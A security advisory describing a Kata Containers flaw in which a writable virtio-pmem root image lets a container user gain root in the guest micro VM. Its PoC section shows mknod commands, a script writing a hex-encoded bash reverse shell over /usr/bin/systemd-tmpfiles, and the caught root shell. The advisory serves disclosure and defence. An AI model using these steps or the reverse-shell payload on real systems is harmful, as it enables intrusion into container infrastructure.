PT-2026-20875 · Go · Github.Com/Kata-Containers/Kata-Containers/Src/Runtime

Published

2026-02-19

·

Updated

2026-02-19

CVSS v4.0

5.2

Medium

VectorAV:L/AC:H/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H

Summary

An issue in Kata with Cloud Hypervisor allows a user of the container to modify the file system used by the Guest micro VM ultimately achieving arbitrary code execution as root in said VM. The current understinding is this doesn’t impact the security of the Host or of other containers / VMs running on that Host (note that arm64 QEMU lacks NVDIMM read-only support: It is believed that until the upstream QEMU gains this capability, a guest write could reach the image file).

Details

Linux virtio-pmem The virtio-pmem probe path always registers the region as a generic pagemap that supports asynchronous flushes, but it never marks the region as read-only. Only the ND REGION PAGEMAP and ND REGION ASYNC bits are set before the region is created, so nd region->ro always stays cleared and the block device is left writable.
Later, pmem attach disk() wires the region into the block layer with full read/write semantics – the block device operations call pmem do write() which performs cache-flushed memcpy operations directly into the host-provided shared memory window. nvdimm check and set ro() would set the disk read-only if the region had been flagged as such, but because virtio pmem never sets that flag, the helper becomes a no-op.
Cloud-Hypervisor virtio pmem discard writes=on causes the file backing the virtio-pmem device to be opened read-only and mapped with MAP PRIVATE rather than MAP SHARED. That combination means the guest can modify the private copy of the mapped pages, but those modifications never propagate back to the underlying file. The guest (and Cloud Hypervisor process) will still read the modified data because it lives in the private copy of the mapping, so write-then-read sequences appear to succeed even though nothing is persisted. Once the mapping is dropped or the VM is restarted, those copy-on-write changes disappear, leaving the backing file unchanged.
Kata /dev/pmem0 Kata boots each pod/VM by DAX-mapping a read-only guest image from the host into the VM and telling the guest kernel to mount the resulting /dev/pmem* device as its root filesystem. Since DAX maps the backing file directly into guest memory, there is no way for the hypervisor to intercept or reject individual stores, so a container with sufficient permissions can open /dev/pmem0 and observe its own writes until the VM is rebooted or the cache is dropped.

PoC

When putting all this together, this means that a user of a Container (not necessarily privileged, we don’t need CAP SYS ADMIN, but we need CAP MKNOD) can modify the Guest OS filesystem, replacing libraries or binaries to achieve arbitrary code execution outside of the Container. This requires computing offsets of files within the device, which requires information like the partition start sector, sector size in bytes, the filesystem block size, and the physical block index of the file.
To achieve execution on the Guest, I replaced /usr/bin/systemd-tmpfiles with a connect-back shell to localhost: timers end up executing 15min after boot. I use debugfs to not require mounting privileges and work directly with the filesystem on /dev/pmem0p1 to get the absolute offset of the file to modify in the device.
If you want a simpler PoC, just dd write something into /dev/pmem0 and observe it's dd readable until discarded.
root@ab5392da44ce:~# mknod /dev/pmem0 b 259 0
root@ab5392da44ce:~# mknod /dev/pmem0p1 b 259 1
root@ab5392da44ce:~# python pmem.py --file /usr/bin/systemd-tmpfiles --write --pattern 23212f62696e2f626173680a62617368202d69203e26202f6465762f7463702f3132372e302e302e312f34343320303e26310a6578697420300a
=== Resolution ===
Partition device:     /dev/pmem0p1 (pmem0p1)
Partition start (sectors): 2048
Sector size (bytes):    512
Partition start (bytes):  1048576
Filesystem block size:   4096
File path:         /usr/bin/systemd-tmpfiles
File offset (bytes):    0
Logical block index:    0
Intra-block offset:    0
Physical block index:   40668
→ Absolute pmem offset:  167624704
[*] Raw read (64 bytes at 167624704):
09fdc000 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
09fdc010 03 00 3e 00 01 00 00 00 20 66 00 00 00 00 00 00 |..>..... f......|
09fdc020 40 00 00 00 00 00 00 00 48 82 01 00 00 00 00 00 |@.......H.......|
09fdc030 00 00 00 00 40 00 38 00 0d 00 40 00 20 00 1f 00 |....@.8...@. ...|
[+] Wrote 58 bytes at absolute offset 167624704. Verifying...
09fdc000 23 21 2f 62 69 6e 2f 62 61 73 68 0a 62 61 73 68 |#!/bin/bash.bash|
09fdc010 20 2d 69 20 3e 26 20 2f 64 65 76 2f 74 63 70 2f | -i >& /dev/tcp/|
09fdc020 31 32 37 2e 30 2e 30 2e 31 2f 34 34 33 20 30 3e |127.0.0.1/443 0>|
09fdc030 26 31 0a 65 78 69 74 20 30 0a          |&1.exit 0.|
root@ab5392da44ce:~# nc -lvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:44880.
bash: cannot set terminal process group (329): Inappropriate ioctl for device
bash: no job control in this shell
root@localhost:/# 
root@localhost:/# ps auxw
ps auxw
USER     PID %CPU %MEM  VSZ  RSS TTY   STAT START  TIME COMMAND
root      1 0.0 0.0 17280 1920 ?    Ss  16:16  0:01 /sbin/init
root      2 0.0 0.0   0   0 ?    S  16:16  0:00 [kthreadd]
root      3 0.0 0.0   0   0 ?    S  16:16  0:00 [pool workqueue release]
root      4 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-rcu gp]
root      5 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-sync wq]
root      6 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-slub flushwq]
root      7 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-netns]
root      9 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/0:0H-events highpri]
root     10 0.0 0.0   0   0 ?    I  16:16  0:01 [kworker/0:1-events power efficient]
root     12 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-mm percpu wq]
root     13 0.0 0.0   0   0 ?    I  16:16  0:00 [rcu tasks trace kthread]
root     14 0.0 0.0   0   0 ?    S  16:16  0:00 [ksoftirqd/0]
root     15 0.0 0.0   0   0 ?    I  16:16  0:00 [rcu sched]
root     16 0.0 0.0   0   0 ?    S  16:16  0:00 [rcu exp par gp kthread worker/1]
root     17 0.0 0.0   0   0 ?    S  16:16  0:00 [rcu exp gp kthread worker]
root     18 0.0 0.0   0   0 ?    S  16:16  0:00 [migration/0]
root     19 0.0 0.0   0   0 ?    S  16:16  0:00 [cpuhp/0]
root     20 0.0 0.0   0   0 ?    S  16:16  0:00 [kdevtmpfs]
root     21 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-inet frag wq]
root     22 0.0 0.0   0   0 ?    S  16:16  0:00 [kauditd]
root     23 0.0 0.0   0   0 ?    S  16:16  0:00 [oom reaper]
root     24 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-writeback]
root     25 0.0 0.0   0   0 ?    S  16:16  0:00 [kcompactd0]
root     26 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-cryptd]
root     27 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-kblockd]
root     28 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/0:1H]
root     29 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/u256:1-events unbound]
root     30 0.0 0.0   0   0 ?    S  16:16  0:00 [kswapd0]
root     31 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-xfsalloc]
root     32 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-xfs mru cache]
root     33 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/u257:0]
root     34 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-kthrotld]
root     36 0.0 0.0   0   0 ?    S  16:16  0:00 [irq/25-ACPI:Ged]
root     37 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-nfit]
root     38 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/0:2-virtio vsock]
root     39 0.0 0.0   0   0 ?    S  16:16  0:00 [hwrng]
root     40 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/u256:2-events unbound]
root     41 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-vfio-irqfd-cleanup]
root     42 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-mld]
root     43 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-ipv6 addrconf]
root     81 0.0 0.0   0   0 ?    S  16:16  0:00 [jbd2/pmem0p1-8]
root     82 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/R-ext4-rsv-conversion]
root     99 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/u256:3]
root     105 0.0 0.0 62032 2568 ?    Ssl 16:16  0:02 /usr/bin/kata-agent
 chrony   117 0.0 0.0 10692  540 ?    S  16:16  0:02 /usr/sbin/chronyd -F 1
 chrony   120 0.0 0.0 10560  460 ?    S  16:16  0:00 /usr/sbin/chronyd -F 1
root     122 0.2 1.0 44876 31556 ?    S  16:16  0:11 python -m server
message+   124 0.0 0.0  8120  384 ?    Ss  16:16  0:00 @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root     129 0.0 0.0   0   0 ?    S  16:16  0:00 [cpuhp/1]
root     130 0.0 0.0   0   0 ?    S  16:16  0:00 [migration/1]
root     131 0.0 0.0   0   0 ?    S  16:16  0:00 [ksoftirqd/1]
root     132 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/1:0-mm percpu wq]
root     133 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/1:0H-events highpri]
root     134 0.0 0.0   0   0 ?    I<  16:16  0:00 [kworker/1:1H]
root     142 0.0 0.0  5400 2220 pts/0  Ss  16:16  0:00 bash -l
root     145 0.0 0.0   0   0 ?    I  16:16  0:00 [kworker/1:1]
root     323 0.0 0.1 13212 3448 pts/0  R+  16:17  0:00 nc -lvp 443
root     329 0.0 0.0  4780  256 ?    Ss  16:31  0:00 /bin/bash /usr/bin/systemd-tmpfiles --clean
root     330 0.0 0.0  5048  512 ?    S  16:31  0:00 bash -i
root     377 0.0 0.0  7480  256 ?    R  17:33  0:00 ps auxw
root@localhost:/#

Impact

Container to Guest micro VM Escape (no escape to Host, no persistence of the overwritten image)

Fix

Incorrect Permission

Weakness Enumeration

Related Identifiers

GHSA-WWJ6-VGHV-5P64

Affected Products

Github.Com/Kata-Containers/Kata-Containers/Src/Runtime